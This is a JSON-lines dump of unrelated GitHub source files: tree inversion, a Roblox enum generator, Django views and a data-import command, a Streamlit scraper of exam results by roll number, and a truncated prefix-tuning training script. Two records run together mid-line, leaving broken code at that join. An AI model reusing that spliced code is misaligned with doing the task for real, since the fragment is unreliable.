if node.right:\n queue.append(node.right)\n \n return root","repo_name":"knightrohit/leetcode_june_challenge_2020","sub_path":"01_Invert_binary_tree.py","file_name":"01_Invert_binary_tree.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"70997308290","text":"import os\n\n\ndef getEnums():\n\twith open(\"enumList.txt\") as f:\n\t\tenumList = f.read()\n\tenums = {}\n\tfor line in enumList.splitlines():\n\t\tsegments = line.split(\".\")\n\t\t# Enum.ENUM_NAME\t .ENUM_VALUE_NAME\n\t\tif enums.get(segments[1]) is None:\n\t\t\tenums[segments[1]] = []\n\t\tenums[segments[1]].append(segments[2])\n\treturn enums\n\n\ndef getLuaCode():\n\tenums = getEnums()\n\n\tenumsCode = \",\\n\\t\".join([\n\t\tf\"---@class {name} : EnumItem @ Really is type `Enum`\\n\\t\"\n\t\tf\"{name}={{\\n\\t\\t\"\n\t\tf\"GetEnumItems=_Enum.GetEnumItems,\\n\\t\\t\"\n\t\t+ \",\\n\\t\\t\".join([\n\t\t\tf\"{enum}={{Name=\\\"{enum}\\\",Value={_enums.index(enum)},EnumType=_Enum}}\"\n\t\t\tfor enum in _enums\n\t\t]) +\n\t\t\"\\n\\t}\"\n\t\tfor name, _enums in enums.items()\n\t])\n\treturn f\"\"\"\n\t-- Generated by {os.path.basename(__file__)}\n\t-- NOTE: the way the class's are defined are done for typing\n\n\t---@language Lua\n\tlocal codeForEnumList = [[\n\tfor _, enum in pairs(Enum:GetEnums()) do\n\t\tfor _, v in pairs(enum:GetEnumItems()) do\n\t\t\tprint(v)\n\t\tend\n\tend\n\t]]\n\n\t---@class EnumItem\n\tlocal _EnumItem = {{\n\t\t---@type string\n\t\tName=nil,\n\t\t---@type number\n\t\tValue=nil,\n\t\t---@type Enum\n\t\tEnumType=nil\n\t}}\n\t---@class Enum\n\tlocal _Enum = {{}}\n\t---@return EnumItem[]\n\tfunction _Enum:GetEnumItems() end\n\n\tEnum = {{\n\t\t{enumsCode}\n\t}}\n\t---@return Enum[]\n\tfunction Enum:GetEnums() end\"\"\".strip()\n\n\nif __name__ == \"__main__\":\n\tluaCode = getLuaCode()\n\twith open(\"api/Enum.lua\", \"w\") as f:\n\t\tf.write(luaCode)\n","repo_name":"Dude112113/RobloxApi-Definitions-Emmy","sub_path":"enumListToEmmy.py","file_name":"enumListToEmmy.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40255869887","text":"from django.shortcuts import render,redirect\nfrom django.conf import settings \nimport os\nfrom architect.models import *\nfrom django.http import FileResponse\nfrom django.core.mail import send_mail\n# Create your views here.\n\n\ndef BASE(request):\n return render(request, 'base.html')\n\ndef HOME(request):\n project = Project.objects.all()\n category = Category.objects.all()\n\n context = {'project': project, 'category': category}\n return render(request, 'Main/home.html', context)\n\ndef Download_CV(request):\n cv_file_path = os.path.join(settings.MEDIA_ROOT, 'PWMola_CV.pdf')\n response = FileResponse(open(cv_file_path, 'rb'), as_attachment=True)\n return response\n\ndef contact_form(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n email_address = request.POST.get('email')\n message = request.POST.get('message')\n\n # Send email\n subject = f\"Contact form submission from {name}\"\n message = f\"Name: {name}\\nEmail: {email_address}\\nMessage: {message}\"\n from_email = settings.DEFAULT_FROM_EMAIL\n recipient_list = [settings.DEFAULT_FROM_EMAIL] # Send email to your email address\n\n send_mail(subject, message, from_email, recipient_list, fail_silently=False)\n\n # Redirect or render a thank-you page\n return redirect('home') # Replace with the URL you want to redirect to","repo_name":"Suzan97/peter_portfolio","sub_path":"architect/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16595673612","text":"def main():\r\n t=int(input())\r\n while(t!=0):\r\n n=int(input())\r\n arr=list(map(int,input().split()))\r\n max_val=-1\r\n for i in range(0,n):\r\n for j in range(i+1,n):\r\n temp=arr[i]+arr[j]\r\n if(max_val 9:\n print('extra disks', server_id)\n sys.exit()\n\n if disk:\n equal = disk.find('=')\n space = disk.find(' ')\n name = disk[0:equal]\n size = int(disk[equal+1:space])\n\n sd = ServerDisk()\n sd.server_id = server_id\n sd.name = name\n sd.size = size\n sd.save()\n\n def add_data(self, xml, server):\n x = self.get_text(xml, 'MWregulateddatacheckboxe1', None)\n if x:\n print(x)\n\n x = self.get_text(xml, 'nonregulateddataDetail', None)\n if x:\n print(x)\n\n def process_record(self, row, type, service_id):\n\n d = Database()\n\n mc_group = row[1].strip(\"'\")\n d.shortcode = row[3].strip(\"'\")\n data = row[5].strip(\"'\")\n\n try:\n xml = ET.fromstring(data)\n except:\n print('error converting XML', data)\n return\n \n\n service_status = self.get_text(xml, 'servicestatus', None)\n if service_status == 'Ended':\n return\n #d.in_service = False\n elif service_status == 'Active':\n d.in_service = True\n else:\n d.service_status = None\n print('service status', service_status)\n\n \n size = self.get_text(xml, 'MDDBSize', None)\n if size:\n size = size.replace('GB','')\n size = int(size)\n d.size = size\n\n\n d.legacy_data = data\n d.name = self.get_text(xml, 'xmlSubscriptionKey', None) #instancename?\n d.owner = LDAPGroup().lookup( mc_group )\n d.support_email = self.get_text(xml, 'afterhoursemail', 'n/a')\n d.support_phone = self.get_text(xml, 'afterhoursphone', 'n/a')\n #d.cpu = self.get_text(xml, 'cpu', 0)\n #d.ram = self.get_text(xml, 'ram', 0)\n\n d.url = self.get_text(xml, 'databaseURL', None)\n\n on_call = self.get_text(xml, 'monitoringsystem', None)\n if on_call == 'businesshours':\n d.on_call = 0\n elif on_call == '247':\n d.on_call = 1\n else:\n print('warning on_call ', on_call, 'not found')\n\n\n\n d.purpose = self.get_text(xml, 'databasepurpose', '')\n\n\n if self.get_text(xml, 'MDsharedordedicated', None) == 'dedicated':\n try:\n d.server = Server.objects.get(name=d.name)\n except:\n print('Server not found', d.name)\n\n type = self.get_text(xml, 'MDDBType', None)\n if type:\n d.type_id = self.database_types.get(type.upper())\n\n try:\n d.save()\n self.LOADS +=1\n #self.add_disks(xml, d.id)\n #self.add_data(xml)\n except Exception as ex:\n print('insert error', ex)\n print(data)\n self.ERRORS +=1\n\n #print(f'{self.LOADS} records Loaded, {self.ERRORS} errors')\n\n\n def add_members(self):\n groups = StorageInstance.objects.distinct('owner')\n\n for group in groups: # Loop through distinct groups\n members = get_mc_group(group.owner) # Pull member list from MCommunity\n print(group.owner)\n if not members == None:\n usernames = []\n for member in members['member']:\n usernames.append(member[4:member.find(',', 0, 99)])\n #print('add', members['member'])\n\n usernames = list( dict.fromkeys(usernames) )\n \n \n instance_list = StorageInstance.objects.filter(owner=group.owner)\n for instance in instance_list: # Add members to all instances using that MC group\n print(instance)\n for username in usernames:\n print(' ', username)\n sm = StorageMember()\n sm.storage_instance = instance\n sm.username = username\n sm.save()\n","repo_name":"ITSComm-Information-Systems/srs","sub_path":"project/management/commands/import_databases.py","file_name":"import_databases.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15124219367","text":"import pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\nimport streamlit as st\n\nhtml = \"\"\"\n

    \n

    FETCHING RESULT

    \n
    \n\"\"\"\nst.markdown(html, unsafe_allow_html=True)\nst.subheader(' ') \n\ncol = ['English (Communication Skills)','Punjabi (Compulsory)','Hindi','Sociology','Cosmetology','History','Political Science',\n 'Punjabi Literature','Music (Vocal)','Physical Education','English Literature','Computer Applications','Economics','Mathematics','Total']\n\ncolumns2 = col.copy() \n#del columns2[-2:]\n\ndf = pd.DataFrame(columns=columns2)\n\nst.markdown(\"\"\"

    Enter URL

    \"\"\", unsafe_allow_html=True)\nuser_url = st.text_input('')\n\nst.markdown(\"\"\"

    Enter First Roll Number

    \"\"\", unsafe_allow_html=True)\nfrno = st.number_input('', min_value=10, max_value=100000) \n\nst.markdown(\"\"\"

    Enter Last Roll Number

    \"\"\", unsafe_allow_html=True)\nsrno = st.number_input(' ', min_value=10, max_value=100000) \n\nurl = []\nfor i in range(frno,srno+1):\n #url2=user_url+str(i)+\"&submit=Submit\"\n url.append(user_url+str(i)+\"&submit=Submit\") \n\n#df.to_csv('Result.csv')\nst.subheader(' ')\nbutton = st.button('Create File')\nif button:\n st.markdown(\"\"\"
    PLEASE WAIT THIS MAY TAKE FEW MINUTES.....
    \"\"\", unsafe_allow_html=True)\n\n dn=[]\n name=[]\n roll_no=[]\n Result=[]\n for ur in url:\n df2=pd.DataFrame(columns=columns2)\n res = requests.get(ur)\n soup = BeautifulSoup(res.text,'html.parser')\n name.append(soup.find('td',{'class':'c3'}).text)\n roll_no.append(ur[-19:-14])\n result = [i.text for i in soup.select('div > b > span')]\n Result.append(result[0])\n n = soup.find('table',{'class':'enf'})\n headers = [tr.text for tr in n.select(\"tr td\")] \n for subject in (9,18,27,36,45,72,81,90): #(17,26,35,44,53,80,89,98) values\n df2[headers[subject]] = [headers[subject+8]]\n dn.append(df2)\n df = pd.concat(dn,axis=0,sort=False)\n\n df.insert(0,'Name',name)\n df.insert(1,'Roll No',roll_no) \n df.insert(18,'Result',Result)\n \n df.to_excel('Result.xlsx')\n st.markdown(\"\"\"

    DONE !!

    \"\"\", unsafe_allow_html=True)\n","repo_name":"koshalnirwan/Web-Scraping","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40378237957","text":"import logging\nimport math\nimport os, transformers, torch\nimport pickle\nimport sys\n\nfrom transformers.data.data_collator import DataCollatorForCLModeling, DataCollatorForTopicClusterLanguageModeling, DataCollatorForProtoClusterLanguageModeling\n\nfrom PrefixTuning.transformers.examples.control.tokenization import WordTokenizer\n\nsys_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))\nsys.path.append(sys_path)\nsys_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(sys_path)\nsys_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(sys_path)\nprint (sys.path)\nimport numpy as np\nfrom dataclasses import dataclass, field\nfrom typing import Optional\n\nfrom transformers.data.datasets.language_modeling import LineByLineUnderstandTextDataset, \\\n LineByLineUnderstandFrontTextDataset, LineByLineCLDataset, LineByLineTopicDataset, LineByLineNoRelDataset, \\\n LineByLineProtoDataset, LineByLinePrivacyDataset\n\nfrom .train_control import PrefixTuning, ClassificationHead, PrefixEmbTuning\nfrom transformers.file_utils import cached_path\n\nimport glob\n\npath = os.path.abspath(transformers.__file__)\n\nfrom transformers import (\n CONFIG_MAPPING,\n MODEL_WITH_LM_HEAD_MAPPING,\n AutoConfig,\n AutoModelWithLMHead,\n AutoTokenizer,\n DataCollatorForLanguageModeling,\n DataCollatorForPermutationLanguageModeling,\n DataCollatorForWeightedLanguageModeling, # modified\n DataCollatorForEmbMatchLanguageModeling, # modified\n DataCollatorForTopicLanguageModeling, # modified\n DataCollatorForLengthLanguageModeling, # modified\n DataCollatorForKeywordLanguageModeling, # modified\n DataCollatorForData2TextLanguageModeling, # modified\n DataCollatorForText2DataLanguageModeling, # modified\n DataCollatorForWritingPromptsLanguageModeling, # modified\n DataCollatorForClassificationSentimentLanguageModeling, # modified\n DataCollatorForSumLanguageModeling, # modified\n HfArgumentParser,\n LineByLineTextDataset,\n LineByLineWithWeightTextDataset, # modified\n LineByLineEmbMatchTextDataset, # modified\n LineByLineTopicTextDataset, # modified\n LineByLineKeywordTextDataset, # modified\n LineByLineLengthTextDataset, # modified\n LineByLineData2TextTextDataset, # modified\n LineByLineLemma2TextTextDataset, # modified\n LineByLineText2DataTextDataset, # modified\n LineByLineTriplesTextDataset, # modified\n LineByLineWebNLGTextDataset, # modified\n LineByLineWritingPromptsTextDataset, # modified\n LineByLineSentimentTextDataset, # modified\n LineByLineClassificationSentimentTextDataset, # modified\n LineByLineClassificationTopicTextDataset,\n LineByLineSumTextDataset, # modified\n PreTrainedTokenizer,\n TextDataset,\n Trainer,\n Trainer_Prefix,\n TrainingArguments,\n set_seed,\n GPT2LMHeadModel,\n BertTokenizerFast,\n BertModel,\n AutoModelForSequenceClassification,\n GPT2LMHeadModelAdapter, BertTokenizer,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nMODEL_CONFIG_CLASSES = list(MODEL_WITH_LM_HEAD_MAPPING.keys())\nMODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)\n\n@dataclass\nclass ModelArguments:\n \"\"\"\n Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.\n \"\"\"\n\n model_name_or_path: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"The model checkpoint for weights initialization. Leave None if you want to train a model from scratch.\"\n },\n )\n prefixModel_name_or_path: Optional[str] = field(\n default=None,\n metadata={\n \"help\": \"The prefix model checkpoint for weights initialization. \"\n \"Leave None if you want to train a model from scratch.\"\n },\n )\n\n prefix_mode: Optional[str] = field(\n default='activation',\n metadata={\n \"help\": \"activation or embedding\"\n },\n )\n\n\n\n preseqlen: Optional[int] = field(\n default=0,\n metadata={\n \"help\": \"preseqlen for how many tokens of prefix should we include.\"\n },\n )\n\n optim_prefix: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"whether we are optimizing the prefix directly, or optimize another amortized function that \"\n \"genrate the prefix.\"\n },\n )\n\n\n\n tuning_mode: Optional[str] = field(\n default='finetune',\n metadata={\n \"help\": \"whether it's doing prefixtune or finetune.\"\n },\n )\n\n objective_mode: Optional[int] = field(\n default=0,\n metadata={\n \"help\": \"In prefixtuning setting, the objective function... \"\n },\n )\n\n top_layers: Optional[int] = field(\n default=2,\n metadata={\n \"help\": \"In finetuning setting, if we only tune the top k layers. \"\n },\n )\n\n adapter_design: Optional[int] = field(\n default=2,\n metadata={\n \"help\": \"For Baseline of the adapter module... (1) means using the NLG adapter reference. \"\n \"(2) means using a design similar to adapter module\"\n },\n )\n\n adapter_bottleneck: Optional[int] = field(\n default=100,\n metadata={\n \"help\": \"For baseline adapter module: the mid dim of the adapter. \"\n },\n )\n\n parametrize_emb: Optional[str] = field(\n default='MLP',\n metadata={\n \"help\": \"MLP or Emb to parametrize when we optimize for the embeddings.\"\n },\n )\n\n prefix_dropout: Optional[float] = field(\n default=0.0,\n metadata={\n \"help\": \"dropout rate for the prefix tuning model. \"\n },\n )\n\n init_random: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"whether to init a random embedding, or use GPT2 embedding for the prefix tuning model. \"\n },\n )\n\n use_dropout: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"whether to use dropout of GPT2 on trainer. \"\n },\n )\n\n mid_dim: Optional[int] = field(\n default=512,\n metadata={\n \"help\": \"the mid dim.\"\n },\n )\n\n dataless_sample_size: Optional[int] = field(\n default=8,\n metadata={\n \"help\": \"the size of samples for each class in dataless training.\"\n },\n )\n\n gumbel: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"use the gumbel softmax trick in training.\"\n },\n )\n\n replay_buffer: Optional[str] = field(\n default='no',\n metadata={\n \"help\": \"use the replay buffer in training.\"\n },\n )\n\n training_obj: Optional[int] = field(\n default=0,\n metadata={\n \"help\": \"use a specified training objective\"\n },\n )\n\n\n dataless_sample_length: Optional[int] = field(\n default=20,\n metadata={\n \"help\": \"the length of samples for each class in dataless training.\"\n },\n )\n\n dataless_control_type: Optional[int] = field(\n default=0,\n metadata={\n \"help\": \"the type of control in dataless training.\"\n },\n )\n\n dataless_usebaseline: Optional[str] = field(\n default='yes',\n metadata={\n \"help\": \"use baseline in dataless training.\"\n },\n )\n\n\n dataless_discri_model_path: Optional[str] = field(\n default='textattack/roberta-base-imdb',\n metadata={\n \"help\": \"the path to discri_model and discri_tokenizer\"\n },\n )\n\n model_type: Optional[str] = field(\n default=None,\n metadata={\"help\": \"If training from scratch, pass a model type from the list: \" + \", \".join(MODEL_TYPES)},\n )\n config_name: Optional[str] = field(\n default=None, metadata={\"help\": \"Pretrained config name or path if not the same as model_name\"}\n )\n tokenizer_name: Optional[str] = field(\n default=None, metadata={\"help\": \"Pretrained tokenizer name or path if not the same as model_name\"}\n )\n cache_dir: Optional[str] = field(\n default=None, metadata={\"help\": \"Where do you want to store the pretrained models downloaded from s3\"}\n )\n\n\n@dataclass\nclass DataTrainingArguments:\n \"\"\"\n Arguments pertaining to what data we are going to input our model for training and eval.\n \"\"\"\n\n train_data_file: Optional[str] = field(\n default=None, metadata={\"help\": \"The input training data file (a text file).\"}\n )\n eval_data_file: Optional[str] = field(\n default=None,\n metadata={\"help\": \"An optional input evaluation data file to evaluate the perplexity on (a text file).\"},\n )\n line_by_line: bool = field(\n default=False,\n metadata={\"help\": \"Whether distinct lines of text in the dataset are to be handled as distinct sequences.\"},\n )\n\n mlm: bool = field(\n default=False, metadata={\"help\": \"Train with masked-language modeling loss instead of language modeling.\"}\n )\n mlm_probability: float = field(\n default=0.15, metadata={\"help\": \"Ratio of tokens to mask for masked language modeling loss\"}\n )\n plm_probability: float = field(\n default=1 / 6,\n metadata={\n \"help\": \"Ratio of length of a span of masked tokens to surrounding context length for permutation language modeling.\"\n },\n )\n max_span_length: int = field(\n default=5, metadata={\"help\": \"Maximum length of a span of masked tokens for permutation language modeling.\"}\n )\n\n task_mode: Optional[str] = field(\n default=None, metadata={\"help\": \"The task mode\"}\n )\n\n format_mode: Optional[str] = field(\n default='cat', metadata={\"help\": \"The mode of data2text format (cat, peek, nopeek)\"}\n )\n\n lowdata_token: Optional[str] = field(\n default='summarize', metadata={\"help\": \"The token to be prepended at initialization time. \"}\n )\n\n use_lowdata_token: Optional[str] = field(\n default='yes', metadata={\"help\": \"Whether we should use the lowdata token and pass it to the prefixTuning Model \"\n \"for the initialization trick. \"}\n )\n\n dataless: Optional[str] = field(\n default='no', metadata={\"help\": \"Whether we are training or loading dataless model.\"}\n )\n\n train_embs: Optional[str] = field(\n default='no', metadata={\"help\": \"whether the train word embeddings\"}\n )\n\n max_source_length: Optional[int] = field(\n default=512, metadata={\"help\": \"the max source length of summarization data. \"}\n )\n\n train_max_target_length: Optional[int] = field(\n default=100, metadata={\"help\": \"the max target length for training data. \"}\n )\n\n val_max_target_length: Optional[int] = field(\n default=100, metadata={\"help\": \"the max target length for dev data. \"}\n )\n\n # controlprefix: Optional[str] = field(\n # default=\"yes\", metadata={\"help\": \"The control mode\"}\n # )\n\n block_size: int = field(\n default=-1,\n metadata={\n \"help\": \"Optional input sequence length after tokenization.\"\n \"The training dataset will be truncated in block of this size for training.\"\n \"Default to the model max input length for single sentence inputs (take into account special tokens).\"\n },\n )\n overwrite_cache: bool = field(\n default=False, metadata={\"help\": \"Overwrite the cached training and evaluation sets\"}\n )\n\ndef get_dataset(\n args: DataTrainingArguments,\n tokenizer: PreTrainedTokenizer,\n sentence_tokenizer: WordTokenizer,\n label_id_List,\n label_list,\n sentence_list,\n evaluate: bool = False,\n cache_dir: Optional[str] = None,\n iterations: int = 0,\n classes_per_it:int = 0,\n sample_per_class:int = 0,\n max_seq_length:int = 0,\n data_type:str = None\n):\n file_path = args.eval_data_file if evaluate else args.train_data_file\n if args.line_by_line:\n if args.task_mode == 'cl':\n dataset = LineByLineCLDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif args.task_mode == 'no_hidden' and data_type=='privacy':\n dataset = LineByLinePrivacyDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif data_type=='privacy':\n dataset = LineByLinePrivacyDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif args.task_mode == 'topic' or args.task_mode == 'no_hidden' or args.task_mode == 'casual_lens':\n dataset = LineByLineTopicDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif args.task_mode == 'no_rel':\n dataset = LineByLineNoRelDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length)\n elif args.task_mode == 'proto' or args.task_mode == 'proto_reg':\n dataset = LineByLineProtoDataset(tokenizer=tokenizer,sentence_tokenizer = sentence_tokenizer, label_id_List= label_id_List,\n label_list=label_list, sentence_list=sentence_list,\n block_size=args.block_size, bos_tok=tokenizer.bos_token,\n eos_tok=tokenizer.eos_token, max_source_length = max_seq_length,\n max_target_length = max_seq_length, iterations = iterations, classes_per_it = classes_per_it, sample_per_class = sample_per_class)\n\n return dataset\n\n else:\n return TextDataset(\n tokenizer=tokenizer,\n file_path=file_path,\n block_size=args.block_size,\n overwrite_cache=args.overwrite_cache,\n cache_dir=cache_dir,\n )\n\n\ndef initilize_gpt2(model_args, data_args):\n #model_args.model_name_or_path = 'gpt2'\n # See all possible arguments in src/transformers/training_args.py\n # or by passing the --help flag to this script.\n # We now keep distinct sets of args, for a cleaner separation of concerns.\n sys_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n sys.path.append(sys_path)\n print(sys.path)\n os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n os.environ['TRANSFORMERS_CACHE'] = os.path.join(sys_path, '.cache/huggingface')\n\n if model_args.config_name:\n config = AutoConfig.from_pretrained(model_args.config_name, cache_dir=model_args.cache_dir)\n elif model_args.model_name_or_path:\n config = AutoConfig.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)\n else:\n config = CONFIG_MAPPING[model_args.model_type]()\n logger.warning(\"You are instantiating a new config instance from scratch.\")\n\n if model_args.tokenizer_name:\n tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, cache_dir=model_args.cache_dir)\n elif model_args.model_name_or_path:\n tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, cache_dir=model_args.cache_dir)\n else:\n raise ValueError(\n \"You are instantiating a new tokenizer from scratch. This is not supported, but you can do it from another script, save it,\"\n \"and load it from here, using --tokenizer_name\"\n )\n\n config._my_arg_tune_mode = model_args.tuning_mode\n\n # 0 means the regular token level objective, which is sum / output_len\n # 1 means the sentence level objective, which is sum\n # 2 means our buggy version which is sum/max_batch(input_len +output_len)\n # 3 means our buggy version which is sum/max_batch(output_len)\n # 4 means our buggy version which is sum/(input_len +output_len)\n config._objective_mode = model_args.objective_mode\n config._my_arg_task_mode = data_args.task_mode\n\n if model_args.tuning_mode in ['finetune', 'adaptertune', 'finetune-top']:\n print('objective is 0 because of finetune')\n elif model_args.tuning_mode == 'prefixtune':\n print('objective is {}'.format(config._objective_mode))\n\n\n if model_args.model_name_or_path:\n print(\"Reading from pre-trained model====================================\")\n print(config.return_dict)\n config.return_dict = True\n model = GPT2LMHeadModel.from_pretrained(\n model_args.model_name_or_path,\n config=config,\n from_tf=bool(\".ckpt\" in model_args.model_name_or_path),\n cache_dir=model_args.cache_dir\n )\n else:\n logger.info(\"Training new model from scratch\")\n model = AutoModelWithLMHead.from_config(config)\n\n if data_args.block_size <= 0:\n data_args.block_size = tokenizer.max_len\n # Our input block size will be the max possible for the model\n else:\n data_args.block_size = min(data_args.block_size, tokenizer.max_len)\n\n\n\n print('adapting the size of the model embedding to include [PAD]')\n print('len(tokenizer) = ', len(tokenizer))\n print(tokenizer.pad_token, tokenizer.pad_token_id)\n if tokenizer.pad_token is None:\n num_added_tokens = tokenizer.add_special_tokens(\n {'pad_token': '[PAD]'})\n if tokenizer.eos_token is None:\n\n tokenizer.eos_token = tokenizer.sep_token\n #tokenizer.eos_token_id = tokenizer.sep_token_id\n if tokenizer.bos_token is None:\n tokenizer.bos_token = tokenizer.cls_token\n #tokenizer.bos_token_id = tokenizer.cls_token_id\n print('len(tokenizer) = ', len(tokenizer))\n print(tokenizer.eos_token, tokenizer.eos_token_id)\n print(tokenizer.bos_token, tokenizer.bos_token_id)\n embedding_layer = model.resize_token_embeddings(len(tokenizer))\n return model, tokenizer\n\ndef train_prefix(label_id_List, label_list, sentence_list, sentence_tokenizer, gpt2, tokenizer, model_args, data_args, training_args, prefix_path, ratio, task_mode=None, aug_epoch=0,aug_iter=0, examples_per_class=0, classes_per_episode=0, num_support=0, max_length=0, warm_epoch=0, prefixModel_name_or_path=None, preseqlen=100,tuning_mode='prefixtune', device='cuda:0',encoder_config=None, data_type = None):\n # See all possible arguments in src/transformers/training_args.py\n # or by passing the --help flag to this script.\n # We now keep distinct sets of args, for a cleaner separation of concerns.\n model_args.tuning_mode = tuning_mode\n model_args.prefixModel_name_or_path = prefixModel_name_or_path\n training_args.output_dir = prefix_path\n sys_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n sys.path.append(sys_path)\n print(sys.path)\n os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n os.environ['TRANSFORMERS_CACHE'] = os.path.join(sys_path, '.cache/huggingface')\n print(int(300 * ratio))\n training_args.num_train_epochs = int(aug_epoch)\n #print(training_args)\n #training_args.device = device\n #setattr(training_args, 'device', device)\n print(training_args.device)\n training_args.per_device_train_batch_size = examples_per_class*classes_per_episode\n print(\"training args\", file=sys.stderr)\n print(training_args, file=sys.stderr)\n\n print(\"model args\", file=sys.stderr)\n print(model_args, file=sys.stderr)\n\n print(\"model arg length\")\n print(model_args.preseqlen)\n model_args.preseqlen = preseqlen\n encoder_embed = encoder_config['hidden_size'] * 2\n data_args.task_mode = task_mode\n alpha = 1000\n training_args.save_steps = 100000\n training_args.warmup_steps = int(aug_iter/training_args.n_gpu) * warm_epoch\n n_support = 0\n iterations = 0\n sample_per_class = 0\n classes_per_it = 0\n if data_args.task_mode == 'proto' or data_args.task_mode == 'proto_reg':\n #encoder_embed = 0\n print(\"devices number =====================\")\n print(training_args.n_gpu)\n training_args.per_device_train_batch_size = 1\n iterations = aug_iter - aug_iter%training_args.n_gpu\n\n\n\n sample_per_class = examples_per_class\n classes_per_it = classes_per_episode\n n_support = num_support\n\n # Set seed\n set_seed(training_args.seed)\n # Load pretrained model and tokenizer\n #\n # Distributed training:\n # The .from_pretrained methods guarantee that only one local process can concurrently\n # download model & vocab.\n\n ####################### bert encoder #########################################\n \"\"\"\n sentence_tokenizer = BertTokenizer.from_pretrained('bert-base-uncased', cache_dir=os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) , '.cache/huggingface'))\n sentence_encoder = BertModel.from_pretrained('bert-base-uncased', cache_dir=os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) , '.cache/huggingface')).to(training_args.device)\n for param in sentence_encoder.parameters():\n param.requires_grad = False\n\n\n file_path = data_args.train_data_file\n\n src_file = '{}/trn.source'.format(file_path)\n tgt_file = '{}/trn.target'.format(file_path)\n\n src_lines = []\n with open(src_file, encoding=\"utf-8\") as f:\n for line in f:\n line = line.strip()\n if len(line) > 0 and not line.isspace():\n src_lines.append(line.split('\\t')[0])\n\n tgt_lines = []\n with open(tgt_file, encoding=\"utf-8\") as f:\n for line in f:\n line = line.strip()\n if len(line) > 0 and not line.isspace():\n tgt_lines.append(line)\n\n assert len(src_lines) == len(tgt_lines)\n proto_type_dict = {}\n for index, tgt_line in enumerate(tgt_lines):\n dis_tgt = sentence_tokenizer(tgt_line, add_special_tokens=True, truncation=True, max_length=100,\n is_split_into_words=False, return_tensors=\"pt\")['input_ids']\n dis_tgt = dis_tgt.to(training_args.device)\n # print (type(sentence_encoder))\n # print (sentence_encoder(dis_tgt))\n sentences_embed = sentence_encoder(dis_tgt, return_dict=True).pooler_output.squeeze()\n #print(sentences_embed.size())\n if src_lines[index] in proto_type_dict:\n proto_type_dict[src_lines[index]].append(sentences_embed)\n else:\n proto_type_dict[src_lines[index]] = []\n proto_type_dict[src_lines[index]].append(sentences_embed)\n\n proto_type_embed = {}\n proto_dict = {}\n for label_id, sentences_embed in proto_type_dict.items():\n gpu_data = torch.stack(sentences_embed).mean(dim=0)\n proto_type_embed[int(label_id)] = gpu_data\n data = torch.stack(sentences_embed).cpu().numpy()\n #print(data.shape)\n mean = np.mean(data, axis=0)\n if not label_id in proto_dict:\n proto_dict[label_id] = {'mean': None, 'cov': None}\n proto_dict[label_id]['mean'] = mean\n cov = np.cov(data, rowvar=0)\n proto_dict[label_id]['cov'] = cov\n #print(len(proto_dict.items()))\n torch.save(proto_dict, os.path.join(training_args.output_dir, \"proto_type_dict.bin\"))\n \"\"\"\n ####################### bert encoder #########################################\n\n\n if model_args.tuning_mode == 'prefixtune' or model_args.tuning_mode == 'bothtune': # prefixtune\n if 